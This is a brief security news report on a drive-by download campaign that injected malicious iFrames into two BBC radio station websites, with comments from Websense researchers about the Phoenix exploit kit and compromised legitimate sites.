Two BBC sites serving malware via injected iFrame

A piece of malware detected by only 21 percent of the anti-virus solutions used by VirusTotal is currently being pushed onto unsuspecting visitors of the BBC 6 Music and BBC 1Xtra radio station websites.

The visitor doesn’t have to do anything except land on the website to become a victim of a so-called drive-by download attack, since the websites have been injected with an iFrame that automatically loads the malicious code from a website parked on a co.cc domain (click on the screenshot to enlarge it):

According to Websense’s experts, the payload is delivered only the first time the user visits the site.

“The code that is delivered to end users utilizes exploits delivered by the Phoenix exploit kit. A malicious binary is ultimately delivered to the end user,” they say, and add that the attack is part of a current mass-injection targeting vulnerable Web sites.

“When someone like the Beeb gets infected by a malicious link, the potential for many innocent people to be affected by malware is huge,” points out Websense Security Labs senior manager Carl Leonard. “Modern threats target places where they will find good traffic which is why we found that 80% of the malicious sites we saw last year were actually legitimate sites that had been compromised.”